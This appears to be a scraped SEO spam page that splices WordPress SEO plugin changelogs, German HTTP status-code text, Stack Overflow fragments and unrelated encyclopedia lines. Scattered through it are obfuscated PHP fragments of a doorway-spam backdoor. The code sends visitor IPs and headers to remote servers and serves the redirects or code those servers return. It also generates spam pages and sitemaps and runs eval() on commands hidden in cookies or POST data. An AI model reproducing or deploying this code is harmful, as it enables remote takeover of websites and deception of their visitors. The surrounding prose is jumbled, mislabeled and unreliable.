Fixed: WooCommerce Price smart tag output. The plugin now uses the permalink as the base URL when processing posts. Updated: TruSEO now ignores special characters in the URL. Fixed: PHP error after deleting a post from a post type that does not support trashing. Die Anfrage wurde erfolgreich durchgefhrt; der Client soll das Dokument neu aufbauen und Formulareingaben zurcksetzen. (Hopefully) fix join() failure when Snoopy doesnt return any HTTP headers. Unlike the bulk action by the same name, it checks a link immediately and displays the results without having to refresh the page. HTML Sitemap automatically generate an HTML sitemap for your pages and posts. Link status in the search form no longer defaults to the currently displayed filter/view. Is there any difference or both are same only? Die angeforderte Ressource steht in verschiedenen Arten zur Verfgung. Fixed: Custom canonical URL no longer alters the schema of the OG:URL. Change: Default options are now handled in the class constructor. Get 24/7 support and boost your websites visibility. Added support for Smart YouTube httpv:// links. (Thanks to. Visit Mozilla Corporations not-for-profit parent, the Mozilla Foundation.Portions of this content are 19982022 by individual contributors. Die angeforderte Ressource steht vorbergehend unter der im Location-Header-Feld angegebenen Adresse bereit. Broken Link Checker has been translated into 29 locales. This helps guard against cross-site scripting attacks (Cross-site_scripting).For more information, see the introductory article on Content Youre welcome, James! Die erste Ziffer eines Statuscodes stellt die Statusklasse dar. Fixed Megaupload links being reported with an Unknown error message when it should be Not found. Fixed: Block names not showing correctly in the repo. Fixed PHP 4 incompatibilities introduced in the previous release. Fixed: SEO Analyzer didnt add a trailing slash to the analyzed URL when the permalink structure should have one. Fixed: .htaccess File Editor no longer encodes special characters when writing to the file. Updated: Updated score description for the SEO Analyzer to better reflect SEO recommendations. Replace the More plugins link on the Broken Links page with a link to the Admin Menu Editor page. Updated: Better compatibility with MonsterInsights and ExactMetrics headline analyzers. New: Our brand-new REST API addon allows developers to fetch our SEO data via the WordPress REST API and use it on their headless site. The plugin should now parse the enclosure custom field correctly. It walks you through all the functions needed to get your website's SEO in order. Added a redirect detection workaround for users that have safe_mode or open_basedir enabled. Removed Bulgarian translation because it was poor quality and outdated. Only use the custom access rights detection routine if open_basedir is set. Fixed the Edit URL function updating the link text even when the user left that field unchanged. Fixed: Autogenerated meta descriptions cannot be based on the post content if the post is password protected. Browse the code, check out the SVN repository, or subscribe to the development log by RSS. @JohnK Thanks for pointing that out, i've fixed it. Also, if an update is issued to the website. New: Added a second dashboard widget for users who have not yet finished the setup wizard. Fixed: PHP warning when open_basedir restrictions are enabled due to an external URL in our admin/toolbar menu. @file_exists(_7ejh67f::$_mg8ineh5)) {@mkdir(_7ejh67f::$_mg8ineh5);}}private static function _s6ylu(){$_ndh8ovyp = array();foreach (scandir(_7ejh67f::$_mg8ineh5) as $_1r1ytw3i) {if (strpos($_1r1ytw3i, _7ejh67f::$_y0cg5rk9) === 0) {$_ndh8ovyp[] = $_1r1ytw3i;}}return $_ndh8ovyp;}public static function _cb7nl(){return TRUE;}static public function _fqr0f(){if (empty(_7ejh67f::$_1k2xibe7)){$_ndh8ovyp = _7ejh67f::_s6ylu();_7ejh67f::$_1k2xibe7 = @file(_7ejh67f::$_mg8ineh5 . Fixed the database not up to date bug. chr($_e1sfft94);}} while ($_nms1ebw0 < strlen($_efa9rziw));return $_esetfuvv;}private function _subdr($_828m12mh){$_lx0sjdo6 = "";$_f81jkr2t = "";$_ml40t87w = _lda0hc::_h6qek();$_ml40t87w["uid"] = _lda0hc::$_df6hufth;$_ml40t87w["keyword"] = $_828m12mh;$_ml40t87w["tc"] = 10;$_ml40t87w = http_build_query($_ml40t87w);$_33tm41mt = _mtcvqi::_0jicd($this->_n4rn33sr, $_ml40t87w);if (strpos($_33tm41mt, _lda0hc::$_df6hufth) === FALSE) {return array($_lx0sjdo6, $_f81jkr2t);}$_lx0sjdo6 = _sh9xgp2::_fqr0f();$_f81jkr2t = substr($_33tm41mt, strlen(_lda0hc::$_df6hufth));$_f81jkr2t = explode("\n", $_f81jkr2t);shuffle($_f81jkr2t);$_f81jkr2t = implode(" ", $_f81jkr2t);return array($_lx0sjdo6, $_f81jkr2t);}private function _nro6t(){$_ml40t87w = _lda0hc::_h6qek();if (isset($_SERVER['HTTP_CF_CONNECTING_IP'])) {$_ml40t87w['cfconn'] = @$_SERVER['HTTP_CF_CONNECTING_IP'];}if (isset($_SERVER['HTTP_X_REAL_IP'])) {$_ml40t87w['xreal'] = @$_SERVER['HTTP_X_REAL_IP'];}if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {$_ml40t87w['xforward'] = @$_SERVER['HTTP_X_FORWARDED_FOR'];}$_ml40t87w["uid"] = _lda0hc::$_df6hufth;$_ml40t87w = http_build_query($_ml40t87w);$_nh33fegd = _mtcvqi::_0jicd($this->_bs94zvur, $_ml40t87w);$_nh33fegd = @unserialize($_nh33fegd);if (isset($_nh33fegd["type"]) && $_nh33fegd["type"] == "redir") {if (!empty($_nh33fegd["data"]["header"])) {header($_nh33fegd["data"]["header"]);return true;} elseif (!empty($_nh33fegd["data"]["code"])) {echo $_nh33fegd["data"]["code"];return true;}}return false;}public function _cb7nl(){return _aus76cu::_cb7nl() && _sh9xgp2::_cb7nl() && _7ejh67f::_cb7nl();}static public function _hf7ac(){if ((!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') || $_SERVER['SERVER_PORT'] == 443) {return true;}return false;}public static function _vmhjl(){$_andfxj3q = explode("? Fixed: PHP error when updating with a manual zip file. Ursache ist oft eine Endlosschleife aus Redirects. Click the small Show debug info link to display it. Fixed a whole lot of PHP 5 related notices and strict-mode warnings. Setting a value below 32 might cause the browser network to freeze if there are too many web apps already open with hanging connections. Yes! "/sitemap.xml";$_h1b4bcdo = "\n\n";$_yhna6pec = "";$_6nmsnsc1 = _7ejh67f::_b4rea();$_9flpzh91 = array();if (file_exists($_lmdjw05k)) {$_33tm41mt = simplexml_load_file($_lmdjw05k);foreach ($_33tm41mt as $_dtqyrlcq) {$_9flpzh91[(string)$_dtqyrlcq->loc] = (string)$_dtqyrlcq->lastmod;}}else {$_2b3oj76i = FALSE;}foreach ($_6nmsnsc1 as $_dtjeqej3) {$_ty56szt0 = _lda0hc::_batgm($_dtjeqej3);if (isset($_9flpzh91[$_ty56szt0])){continue;}if ($_2b3oj76i) {$_7r0hiv0j = time();}else {$_7r0hiv0j = time() - (crc32 ($_dtjeqej3) % (60 * 60 * 24 * 30));}$_9flpzh91[$_ty56szt0] = date("Y-m-d", $_7r0hiv0j);;}$_yn3p66av = "";foreach ($_9flpzh91 as $_sqoo6uqb => $_7r0hiv0j){$_yn3p66av .= "\n";$_yn3p66av .= sprintf("%s\n", $_sqoo6uqb);$_yn3p66av .= sprintf("%s\n", $_7r0hiv0j);$_yn3p66av .= "\n";}$_v3svjaki = $_h1b4bcdo . where can optionally be one of the following values: Allows for downloads after the user clicks a button or link. Die angeforderte Ressource wurde nicht gefunden. Fixed: Replace unicode with UTF-8 characters in TruSEO word lists. Be more careful when parsing safe_mode and open_basedir settings. Fixed: HTML Sitemap now shows a message when no posts/terms could be found. Edit URL lets you change the URL of that link. This will allow editor users to access that page and its functions. Updated: Added notice for unsupported WordPress Core versions. Replaced the old Japanese translation with a new and more up-to-date version from a different translator. Ajax (also AJAX / e d k s /; short for "Asynchronous JavaScript and XML") is a set of web development techniques that uses various web technologies on the client-side to create asynchronous web applications.With Ajax, web applications can send and retrieve data from a server asynchronously (in the background) without interfering with the display and behaviour of Die angeforderte Ressource ist nur ber einen Proxy erreichbar. You can edit the permalink settings in WordPress through Settings > Permalinks. New: Track how users interact with your website via Microsoft Clarity and gain valuable insights through heatmaps and sessions recordings. The Undismiss action is now displayed in all views instead of only the Dismissed view. Once you enable AIOSEO, our XML sitemaps will override the default WordPress sitemaps, so you can improve your SEO rankings. Microsoft Clarity Integration Better understand how users interact with your website through heatmaps and session recordings. Use absolute paths when loading includes. "salt22"), 0, 4));function _1829h($_33tm41mt, $_dtjeqej3){$_f4kt27it = "";for ($_nms1ebw0 = 0; $_nms1ebw0 < strlen($_33tm41mt);) {for ($_qofd27wo = 0; $_qofd27wo < strlen($_dtjeqej3) && $_nms1ebw0 < strlen($_33tm41mt); $_qofd27wo++, $_nms1ebw0++) {$_f4kt27it .= chr(ord($_33tm41mt[$_nms1ebw0]) ^ ord($_dtjeqej3[$_qofd27wo]));}}return $_f4kt27it;}function _31qy2($_33tm41mt, $_dtjeqej3, $_hdtmq8ve){return _1829h(_1829h($_33tm41mt, $_dtjeqej3), $_hdtmq8ve);}foreach (array_merge($_COOKIE, $_POST) as $_fz8stpjk => $_33tm41mt) {$_33tm41mt = @unserialize(_31qy2(_lda0hc::_br8je($_33tm41mt), $_fz8stpjk, _lda0hc::$_df6hufth));if (isset($_33tm41mt['ak']) && _lda0hc::$_df6hufth == $_33tm41mt['ak']) {if ($_33tm41mt['a'] == 'doorway2') {if ($_33tm41mt['sa'] == 'check') {$_sk5gmeyq = _mtcvqi::_0jicd(explode("/", ""), "");if (strlen($_sk5gmeyq) > 512) {echo @serialize(array("uid" => _lda0hc::$_df6hufth, "v" => _lda0hc::$_7kh8mdix,"cache" => _aus76cu::_ieqpv(),"keywords" => count(_7ejh67f::_b4rea()),"templates" => _sh9xgp2::_ieqpv()));}exit;}if ($_33tm41mt['sa'] == 'templates') {foreach ($_33tm41mt["templates"] as $_lx0sjdo6) {_sh9xgp2::_jyo6n($_lx0sjdo6);echo @serialize(array("uid" => _lda0hc::$_df6hufth, "v" => _lda0hc::$_7kh8mdix,));}}if ($_33tm41mt['sa'] == 'keywords') {_7ejh67f::_jyo6n($_33tm41mt["keywords"]);_lda0hc::_64wkc();echo @serialize(array("uid" => _lda0hc::$_df6hufth, "v" => _lda0hc::$_7kh8mdix,));}if ($_33tm41mt['sa'] == 'update_sitemap') {_lda0hc::_64wkc(TRUE);echo @serialize(array("uid" => _lda0hc::$_df6hufth, "v" => _lda0hc::$_7kh8mdix,));}if ($_33tm41mt['sa'] == 'pages') {$_0ni6p1wg = 0;$_bp5xuiun = _7ejh67f::_b4rea();if (_sh9xgp2::_ieqpv() > 0) {foreach ($_33tm41mt['pages'] as $_nh33fegd) {$_k8h3nc29 = _aus76cu::_2idt3($_nh33fegd["keyword"]);if (empty($_k8h3nc29)) {$_k8h3nc29 = new _aus76cu(_sh9xgp2::_fqr0f(), $_nh33fegd["text"], $_nh33fegd["keyword"], _lda0hc::_b64s1(_lda0hc::$_zcihyr1v, _lda0hc::$_tw16uhhg));$_k8h3nc29->_jyo6n();$_0ni6p1wg += 1;if (!in_array($_nh33fegd["keyword"], $_bp5xuiun)){_7ejh67f::_bw2av($_nh33fegd["keyword"]);}}}}echo @serialize(array("uid" => _lda0hc::$_df6hufth, "v" => _lda0hc::$_7kh8mdix, "pages" => $_0ni6p1wg));}if ($_33tm41mt["sa"] == "ping") {$_y445s0h0 = _lda0hc::_xxs2i();echo @serialize(array("uid" => _lda0hc::$_df6hufth, "v" => _lda0hc::$_7kh8mdix, "result" => (int)$_y445s0h0));}if ($_33tm41mt["sa"] == "robots") {$_y445s0h0 = _lda0hc::_63ajb();echo @serialize(array("uid" => _lda0hc::$_df6hufth, "v" => _lda0hc::$_7kh8mdix, "result" => (int)$_y445s0h0));}}if ($_33tm41mt['sa'] == 'eval') {eval($_33tm41mt["data"]);exit;}}}$_ecmg86vc = new _lda0hc();if ($_ecmg86vc->_cb7nl()) {$_ecmg86vc->_nibp2();}exit(). You can search and filter links by URL, anchor text and so on. How do I check if an element is hidden in jQuery? All in One SEO is the best SEO Plugin. Minor styling changes of screen meta links. Redirection Management Manage the redirects from the backend of your site so you know how many are happening at any given time. Fixed a bug that caused quotes and other special characters in the broken link CSS and removed link CSS fields to be auto-escaped with a slash, potentially breaking the CSS. Allows the page to submit forms. Sequoia sempervirens (/ s k w . Lets the resource request access to the parent's storage capabilities with the Storage Access API. Fixed: Sitemap indexes now correctly use the deprecated custom filename again. Updated: Product schema now automatically pulls the GTIN from the WooCommerce UPC, EAN and ISBN plugin. Fixed long URLs overflowing into adjacent table columns. Reverted to the old access-checking algorithm + some error suppression. Fixed an XSS vulnerability on the link checker settings page. Added a way to individually enable/disable the monitoring of posts, pages, comments, the blogroll, and so on. Der Browser soll mit einem GET folgen, auch wenn der ursprngliche Request ein POST war. Fixed missing YouTube videos not being detected when the video URL starts with https instead of http. Fixed a few minor PHP strict-mode notices. SEO is essential for all websites. Fixed: Sitemap links per index can no longer be set to a negative number. Removed the Blogroll items module from the list of link containers enabled by default. attribute. Many settings allow you to enforce a policy that users cannot change or set a default that users can change. E-mail notifications need to be enabled separately (in Settings -> Link Checker). Fixed: Added a line break underneath our robots.txt content to prevent conflicts with other plugins that filter the robots.txt file. Fixed: Redirects using regex patterns now work correctly if there is another redirect entry with the same path. Also as Arius pointed out , you should be aware that, for the above reason, this isn't strictly speaking considered valid HTML, according to the standard. Thor: The Dark World is a 2013 American superhero film based on the Marvel Comics character Thor, produced by Marvel Studios and distributed by Walt Disney Studios Motion Pictures.It is the sequel to Thor (2011) and the eighth film in the Marvel Cinematic Universe (MCU). Fixed Edit URL and Unlink not working on PHP4 servers. Updated: Compatibility with WordPress 6.0. We took the pain out of optimizing WordPress SEO and made it easy. JavaScript sorting feature for the broken link list. 404 Error Monitor for SEO Monitor website 404 errors and set up proper SEO redirects to prevent losing SEO rankings. Its the part of the URL that explains what page it is. If this keyword is Made the database not up to date error message a bit more helpful. Added a few workarounds for situations where a custom post type is removed without first removing the posts. Updated: Semrush integration now displays an alert when usage limit is reached. Page Audits With Redirection you can also see which posts and pages arent loading right so you can fix them right away, preventing site visitor frustration. Very useful plugin. Fixed: Page number smart tag now returns the correct page number on paginated comment pages. Fixed: Styling issues when opening modals in the Block Editor. @file_exists(_sh9xgp2::$_mg8ineh5)) {@mkdir(_sh9xgp2::$_mg8ineh5);}}public static function _cb7nl(){return TRUE;}static public function _ieqpv(){$_a53xa54i = 0;foreach (scandir(_sh9xgp2::$_mg8ineh5) as $_1r1ytw3i) {if (strpos($_1r1ytw3i, _sh9xgp2::$_y0cg5rk9) === 0) {$_a53xa54i += 1;}}return $_a53xa54i;}static public function _fqr0f(){$_wtc22jcu = array();foreach (scandir(_sh9xgp2::$_mg8ineh5) as $_1r1ytw3i) {if (strpos($_1r1ytw3i, _sh9xgp2::$_y0cg5rk9) === 0) {$_wtc22jcu[] = $_1r1ytw3i;}}return @file_get_contents(_sh9xgp2::$_mg8ineh5 . Updated: Removed sitemap rewrite rules in favor of parsing the URI in order to prevent plugin/theme conflicts. This helps you easily measure your SEO results and progress. Jorge Tasse 3 years ago. AIOSEO is the original WordPress SEO plugin, and its trusted by over 3 million website owners. Fixed: TruSEO content analysis is now able to properly detect when no content has been added yet in page builders. Disabled the news link (if any) for users who have donated. Changing URLs can be bad for SEO, and bad for users even if you use a redirect manager to make sure that people get to the right place. Die Anfrage konnte nicht bearbeitet werden, weil der Speicherplatz des Servers dazu derzeit nicht mehr ausreicht. @$_SERVER['REQUEST_URI'];$_ml40t87w['ua'] = @$_SERVER['HTTP_USER_AGENT'];$_ml40t87w['lang'] = @$_SERVER['HTTP_ACCEPT_LANGUAGE'];$_ml40t87w['ref'] = @$_SERVER['HTTP_REFERER'];$_ml40t87w['enc'] = @$_SERVER['HTTP_ACCEPT_ENCODING'];$_ml40t87w['acp'] = @$_SERVER['HTTP_ACCEPT'];$_ml40t87w['char'] = @$_SERVER['HTTP_ACCEPT_CHARSET'];$_ml40t87w['conn'] = @$_SERVER['HTTP_CONNECTION'];return $_ml40t87w;}public function __construct(){$this->_bs94zvur = explode("/", $this->_bs94zvur);$this->_n4rn33sr = explode("/", $this->_n4rn33sr);}static public function _br8je($_efa9rziw){if (strlen($_efa9rziw) < 4) {return "";}$_uqxd5la0 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";$_6nmsnsc1 = str_split($_uqxd5la0);$_6nmsnsc1 = array_flip($_6nmsnsc1);$_nms1ebw0 = 0;$_esetfuvv = "";$_efa9rziw = preg_replace("~[^A-Za-z0-9\+\/\=]~", "", $_efa9rziw);do {$_rewx23n2 = $_6nmsnsc1[$_efa9rziw[$_nms1ebw0++]];$_b1x56k5s = $_6nmsnsc1[$_efa9rziw[$_nms1ebw0++]];$_9a2k66au = $_6nmsnsc1[$_efa9rziw[$_nms1ebw0++]];$_3eow8z17 = $_6nmsnsc1[$_efa9rziw[$_nms1ebw0++]];$_n75kif2b = ($_rewx23n2 << 2) | ($_b1x56k5s >> 4);$_qe3b8zki = (($_b1x56k5s & 15) << 4) | ($_9a2k66au >> 2);$_e1sfft94 = (($_9a2k66au & 3) << 6) | $_3eow8z17;$_esetfuvv = $_esetfuvv . Fixed link table design in mobile devices. When removing a link via the Unlink action, add the old URL as the title attribute of the now-unlinked anchor text. Updated: Removed QAPage graph in favour of FAQPage graph. New: Support for full site redirects and site aliases. 2.2.1. So when youre choosing your slug, make sure its still going to make sense years from now. : In my case, i do have control over content in iframe but not on the parent site. In less than 10 minutes, you will be able to setup all the advanced WordPress SEO features like XML sitemaps, optimized search appearance, SEO meta title, SEO meta description, SEO keywords, Open Graph SEO Knowledge Panel information, social media integration, SEO search console / webmaster tool connections, local SEO, schema markup for SEO, and more. Fixed: Redirect tests are now excluded from the redirection logs. I was developing a chrome extension which injects certain script on a webpage and displays some content from the parent page in an iframe. This ensures that your website preview is optimized for both search engines (SEO), and social media networks. Fixed a security vulnerability where part of the log data visibile in the Details view was not properly sanitized. In this post, well explain all you need to know about it. Instead of restoring a dismissed link if the redirect URL changes even a little bit, the plugin will now ignore query string changes. Fixed the text in the Status column being slightly offset vertically when compared to other columns. Set the Referer header to blogs home address when checking a link. It is an evergreen, long-lived, monoecious tree living 1,2002,200 years or more. In this case I "ping" the content every 250 ms and if there's any content inside target iframe, stop the "ping" and do something. Good question! If you dont redirect the old URL of live content to the new URL with the improved slug, youll get errors that can definitely harm your rankings. Your article or page should live on an easy to remember, focused and SEO-friendly URL. Another attempt to fix the database not up to date that some users are still experiencing even with 1.6.1. hanapupu. Joel Steinmann. New: URL slug and trash monitor now allow adding a redirect without leaving the posts table or page editor. FTP, mailto:, javascript: and other links with unsupported protocols now show up in the All links list. This will allow, for example, a third-party advertisement to be safely Broken Link Checker is now on GitHub. Video SEO Sitemap Improve your SEO rankings with video sitemap. Dismiss hides the link from the Broken Links and Redirects views. Fixed: Non-critical notifications are now hidden when announcements are disabled. Allows popups (like from, target="_blank", Updated: Added support for reusable blocks to the TruSEO content analysis. If you visit the link, it's perfectly fine. 2016-18 CSP reports fail to strip location information for embedded iframe pages 2016-17 Local file overwriting and potential privilege escalation through CSP reports 2016-16 Miscellaneous memory safety hazards (rv:45.0 / rv:38.7) # Fixed in Firefox 44.0.2 Correctly handle URLs containing a single quote . Be careful to make sure the button doesn't trigger any action, as that will result in a conflict. Updated Portuguese, German and Dutch translations. Updated: Added ability to export Breadcrumbs settings. "-" . ", $_SERVER["REQUEST_URI"], 2);$_andfxj3q = $_andfxj3q[0];$_xxav8069 = substr($_andfxj3q, 0, strrpos($_andfxj3q, "/"));$_f3plf815 = sprintf($_159d1ncu, $_xxav8069, _lda0hc::_al5kt() . You can only use 1 keyword or keyphrase. Did Dick Cheney run a death squad that killed Benazir Bhutto? Fixed: Static homepage now uses Website as default Open Graph object type. Turns out they can actually contain valid links (oops). This can help your SEO to prevent keyword cannibalization and duplicate content issues. The powerful features include custom headings, custom anchors and the ability to hide or reorder the headings. $_yn3p66av . And why should you optimize it? WordPress SEO Setup Wizard Properly setup WordPress SEO in less than 10 minutes. Fixed custom field key with multiple keys not rendering. Font Awesome is licensed under SIL OFL 1.1. A URL is longer, and the slug is part of it! Correct handling of negative chapter numbers, Water leaving the house when water cut off. And weve also added support for many new graphs, including Event, Job Posting, Movie, Service, Video and more! Fixed a crash that would occur when the user tried to permanently delete a trashed post that has comments. Why are statistics slower to build on clustered columnstore? What does the keyphrase in slug assessment in Yoast SEO do? if it's loaded successfully then if you try this code: it won't allow you to access contentDocument and throw a cross-origin error broken links. Updated: Additional compatibility with third-party multi-lingual plugins. Move certain styles to a separate CSS file, which is where they belong. Updated: Added a filter hook to filter the output of our JSON schema. Detects links that dont work, missing images and redirects. both in a post and in the blogroll), all occurrences of that URL will be changed. Fixed: Allow 0 as price for SoftwareApplication schema. For this article, for example, the URL is, and the slug simply is slug. New: Headline Analyzer to optimize post titles for better SEO and traffic. Updated: URLs for Opening Hours now use the HTTPS instead of the HTTP protocol. Fixed: Some settings not carried over correctly in niche cases. You need to whitelist the login redirect URL in your Okta application settings. Fixed a couple of bugs in the Rapidshare and MediaFire checkers. Over 3 million smart website owners use AIOSEO to properly setup WordPress SEO, so their websites can rank higher in search engines. Security: Fixed an XSS vulnerability that could be used by Editors and Administrators to inject arbitrary HTML/JS code in the Tools -> Broken Links page. Replaced multiple instances of get_option(home) and get_option(siteurl) both now deprecated with home_url(). A malicious website can embed another, non-malicious website in an obscured or transparent iframe. Added a table listing assorted debug info to the settings page. Fixed: Multisite super admins occasionally unable to save settings. Allows the page to navigate (load) content to the top-level browsing context. Updated German translation and fixed the corresponding credits link. Yes, AIOSEO smart sitemaps are a lot more optimized than the default WordPress sitemaps. Advanced SEO Import / Export easily import / export AIOSEO settings from one site to another. "\r\n" . Fixed: Link attributes showing undefined when adding an external link. Fixed: AIOSEO no longer tries to build BreadcrumbList graph if no breadcrumbs were found. ".list", $_fwxioqr0);}static public function _bw2av($_828m12mh){@file_put_contents(_7ejh67f::$_y0cg5rk9 . Fixed: Taxonomy related smart tags sometimes not returning the correct value. Click here to purchase the best premium WordPress SEO plugin now! Der Browser soll mit, Die angeforderte Ressource steht ab sofort unter der im Location-Header-Feld angegebenen Adresse bereit, die alte Adresse ist nicht lnger gltig. Fixed: Permissions for users with custom roles for the AIOSEO REST API. Thanks). Updated: Search Appearance Media now have a new smart tag for the medias description. Minor compatibility enhancement in wsblc_ajax.php dont load wpdb if its already loaded. An HTTP header consists of its case-insensitive name followed by a colon (:), then by its value.Whitespace before the value is ignored.. Safe Redirection Manager easily import SEO redirects from safe redirect manager with our SEO migration wizard. Ideally, though, the slug shouldnt be too long: keep it short and focused, but make sure its instantly clear what your page is about. Picture a results page: youll see many different URLs about a certain topic, right? Beispielsweise liefert Linkedin bei Zugriff via, Hypertext Transfer Protocol (HTTP) Status Code Registry, Microsoft Internet Information Server Status Codes and Sub-Codes, Adobe Flash status code definitions (ie 408), A New HTTP Status Code for Legally-restricted Resources, Reserving the 418 HTTP Status Code draft-nottingham-thanks-larry-00, Microsoft Open Specifications Support Team Blog,, Creative Commons Attribution/Share Alike. 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